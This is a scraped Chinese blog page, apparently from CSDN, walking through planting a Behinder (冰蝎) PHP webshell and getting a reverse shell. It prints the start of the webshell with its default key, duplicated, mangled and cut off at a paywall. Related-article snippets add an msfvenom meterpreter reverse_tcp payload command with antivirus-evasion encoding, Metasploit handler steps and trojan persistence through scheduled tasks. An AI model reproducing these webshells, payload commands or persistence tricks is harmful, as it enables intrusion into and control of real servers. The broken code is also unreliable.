冰蝎 连接木马到反弹shell拿到权限全过程

最新推荐文章于 2025-04-09 00:00:00 发布
最新推荐文章于 2025-04-09 00:00:00 发布
阅读量1.3w 收藏 44
点赞数 5
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/hackzkaq/article/details/110122723

一.冰蝎简介

什么是冰蝎

“冰蝎”是一个动态二进制加密网站管理客户端。
在实战中一代webshell管理工具“菜刀”的流量特征非常明显,很容易就被安全设备检测到。
基于流量加密的webshell变得越来越多,“冰蝎”在此应运而生。

一.冰蝎连接getshell方法

1.加入冰蝎特有的的PHP木马,(注意:使用一句话木马无法连接冰蝎),连接密码可以随意改动格式为md5 32为的前16为值 md5(admin)[0-16]

<?php @errorreporting(0); session_start(); $key=”e45e329feb5d925b”; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond <?php @error_reporting(0); session_start(); $key=”e45e329feb5d925b”; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond $_SESSION[‘k’]=$key; $post=file_get_contents(“php://input”); if(!extension_loaded(‘openssl’)) { $t=”base64“.”decode”; $post=$t($post.””); for($i=0;$i

二.冰蝎getshell

1.建好的木马放入我们phpstudy网站的根目录
在这里插入图片描述

2.到我们的位置

最低0.47元/天 解锁文章
zkzq
关注
[网络安全自学篇] 六十三.hack the box渗透之OpenAdmin题目及蚁剑管理员提权(四)
杨秀璋的专栏
03-27 1万+
在撰写这篇文章之前,我先简单分享下hack the box实验感受。hack the box是一个在线渗透平台,模拟了真实环境且难度较大,各种Web渗透工具及操作串联在一起,挺有意思的。本文详细讲解了hack the box机器配置,通过OpenAdmin题目分享管理员权限Flag获取流程,希望对您有所帮助。同时,该网站题目细节不便于透露,推荐大家亲自去尝试,本文更多的分享一些思想。
[网络安全自学篇] 六十.Cracer第八期——(2)五万字总结Linux基础知识和常用渗透命令
杨秀璋的专栏
03-19 1万+
作为Web渗透的初学者,Linux基础知识和常用命令是我们的必备技能,本文详细讲解了Linux相关知识点及Web渗透免了高龄。如果想玩好Kali或渗透,你需要学好Linux及相关命令,以及端口扫描、漏洞利用、瑞士军刀等工具。安全领域通常分为网络安全(Web渗透)和系统安全(PWN逆向)两个方向。非常基础的一篇文章,希望能够帮助到您!
反弹shell---生成木马反弹shell(Windows)
weixin_50956890的博客
05-04 4398
Windows反弹shell的一种方式--生成木马
冰蝎下的反弹shell连接msfconsole
热门推荐
Master先生的博客
01-07 5万+
文章目录前言一、使用木马getshell1.搭建环境二、冰蝎配置三、kali监听总结 前言 好久没碰美少妇(MSF)了,恰巧昨天在群里水群,有个表哥问为什么msf监听不到数据。为此我带着表哥的疑问进行了简单的研究。大体的流程和思路我简单记录一下。其中的坑还是不少的,希望这篇文章对初识冰蝎的表哥们有点用处。 一、使用木马getshell 冰蝎之所以强还是在于他的动态二进制加密。这里呢,在冰蝎下载的包中给出了官方的webshell。在server文件夹下。 这里呢,我踩过一个坑。不知道是我电脑配置的问题还是就
CS内网渗透 - 如何通过冰蝎 Webshell 上线 Weblogic 服务器到 Cobalt Strike 并绕过杀软检测(360、火绒)?
最新发布
浩策盾悟
04-09 6516
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<你的IP> LPORT=4444 -f exe -o beacon.exe -e x86/shikata_ga_nai -i 5。msfvenom -p windows/meterpreter/reverse_tcp LHOST=<你的IP> LPORT=4444 -f exe -o beacon.exe -e x86/shikata_ga_nai -i 5。
冰蝎反弹shell
weixin_50574090的博客
09-14 1562
攻击端ip:192.168.1.114 靶机ip:192.168.1.87 kali:192.168.1.119 冰蝎压缩包里面server文件中的php 文件放到靶机已安装好的apache安装目录中的www目录下 启动apache服务 尝试访问shell.php文件 打开冰蝎,右击新增如下,保存。 选择已添加的地址,点击打开,选择反弹shell 打开kali,执行msfconsole --->use exploit/multi/handler --->set p...
冰蝎利用免杀webshell链接,反弹shell(附免杀webshell和工具)
qq_41132792的博客
09-06 2490
我们这里需要的是java环境,版本的话最好就是安装Java最新的了,Windows也是可以使用的,我这里主要介绍的是Linux上使用,我是基于kali中使用的。我们因为是实验的关系,本地搭建一个网站就好了,Windows的选择phpstudy就好,Linux的百度一下安装下apache即可。然后会弹出我们的图形界面,这里我们就先停一下,将我们的木马传到/var/www/html这个文件夹中,这里我们可以自定义请求头,然后保存即可,保存完我们双击进去。首先我们启动冰蝎,这里我将它放到了我的工具包中,
冰蝎
世间繁华梦一出
03-04 3607
冰蝎什么是冰蝎冰蝎的特点加密原理通信过程 什么是冰蝎? “冰蝎”是一个动态二进制加密网站管理客户端。在实战中,第一代webshell管理工具"菜刀"的流量特征非常明显,很容易就被安全设备检测到。基于流量加密的webshell变得越来越多,"冰蝎"在此应运而生。 "冰蝎"客户端基于JAVA,所以可以跨平台使用,最新版本为v2.0.1,兼容性较之前的版本有较大提升。主要功能为:基本信息、命令执行、虚拟终端、文件管理、Socks代理、反弹shell、数据库管理、自定义代码等,功能非常强大 冰蝎的特点 流量加密
冰蝎不出网反弹shell
09-06
- *1* [冰蝎 连接木马反弹shell拿到权限全过程](https://blog.youkuaiyun.com/hackzkaq/article/details/110122723)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
Windows权限维持
A526847的博客
05-24 1159
隐藏文件的方式还有很多,比如伪装成一个系统文件夹图标,利用畸形文件名、保留文件名无法删除,甚至取一个与系统文件很像的文件名并放在正常目录里面,很难辨别出来。进程注入,一直是病毒木马的惯用手段,同时,它也是一种隐藏技术。攻击者在获取服务器权限后,通常会用一些后门来维持权限,如果你想让你的后门保持的更久些,那么请隐藏好它,使之不易被管理员发现。最简单的一种隐藏文件的方式,文件右键属性,勾选隐藏,点击确定后,在这个文件里看不到刚刚的文件了。如果要让文件显示出来,就点击查看,勾选显示隐藏的文件,文件就显示出来。
冰蝎反弹shell到MSF
渗透之路,攻防之间皆学问
04-15 6773
我们利用冰蝎获取到了一个shell,那接下来要反弹shell到VPS(阿里云)中的MSF,方便进行后渗透。 1. 如下,获取到了shell 2. 选择反弹shell 如下填写vps的ip,和监听的端口。下面有提示使用的payload我们将其填入msf中,对于不同的shell,这里生成的msf模块都会不一样,我们按照它给的填入就行 3. vps启动msf,设置本地的内网的网卡和监听的端口,如果只有一块网卡的话也可以填0.0.0.0,端口和冰蝎反弹shell的填写的端口一样。 4. 在冰
精简&明文免杀冰蝎php一句话.php
10-30
php一句话免杀绕过安全狗、D盾等WAF防护软件 可以轻松绕过 waf 的检测
suricata规则:Suricata IDS规则使用检测红队渗透恶意行为等,支持检测CobaltStrikeMSFEmpireDNS隧道Weevely菜刀冰蝎反弹shellICMP隧道等
02-06
suricata规则:Suricata IDS规则使用检测红队渗透恶意行为等,支持检测CobaltStrikeMSFEmpireDNS隧道Weevely菜刀冰蝎反弹shellICMP隧道等
冰蝎v2.0.1.zip
05-19
冰蝎webshell连接工具,无毒无后门,可放心使用
冰蝎-2.0.1(解压密码:111)
08-23
###2019.2.15 v2.0.1 t00ls专版 更新日志 1.修复了PHP 5.3.0之前版本提示JSON错误的问题。 ###2019.2.9 v2.0 t00ls专版 更新日志 1.增强了PHP的兼容性,PHP 5.2~PHP 7.2.15全版本支持,加密方式根据服务器端支持情况动态选择,不再依赖openssl扩展。 2.虚拟终端命令执行结果增加了右键复制功能。 3.数据库查询结果可复制(单个单元格、单行),可导出SQL查询结果。 4.增加了自定义请求头的功能,可自定义cookie等。 5.增加了HTTP代理连接功能。 6.通过虚拟终端启动的shell进程可关闭,避免服务器侧残留shell进程。 7.增加了简单的asp支持。 8.增加了服务器端输出容错功能,服务器端前后可插入混淆字符串,如gif文件头等。 9.修复了某些php环境下报always_populate_raw_post_data 错误。 10.修复了PHP 7环境下虚拟终端无法打开的问题。 11.修复了一些其他的bug。
冰蝎-v1.0-master.zip
07-16
冰蝎-v1.0-master.zip,冰蝎过狗无后门
容器内反弹shell的51种姿势
帮助别人等于帮助自己 ——MXi4oyu
11-19 1636
什么是反弹shell反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向
冰蝎4.0jsp木马浅析
Dokii_i的博客
01-16 4130
这里简单学习一下冰蝎是怎么运行的,如何通过加密解密来绕过一些常见的waf设备在看完了冰蝎是怎么连接之后,对于冰蝎的工作原理也有了一定的理解,本地和服务器端都做加密和解密的操作,以此来绕过流量检测设备以及一些waf,而且通过动态的加载class字节码,也可以绕过一些普通的webshell查杀设备,后续的一些绕过,可以在加密方式以及特征值的修改上入手。
kali监听win2008;反弹shell;msf生成木马;留后门;权限维持;
xiaochenhang的博客
08-30 1459
2、在win2008里面使用这条命令,将创建⼀个abc计划任务,每⼀分钟 执⾏⼀次abcd.exe;1、填写自己kali地址和要使用的端口号;生成abcd.exe木马;4、kali使用msfconsole工具进行渗透。注意abcd.exe路径;在计算机管理里面可以看见。...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值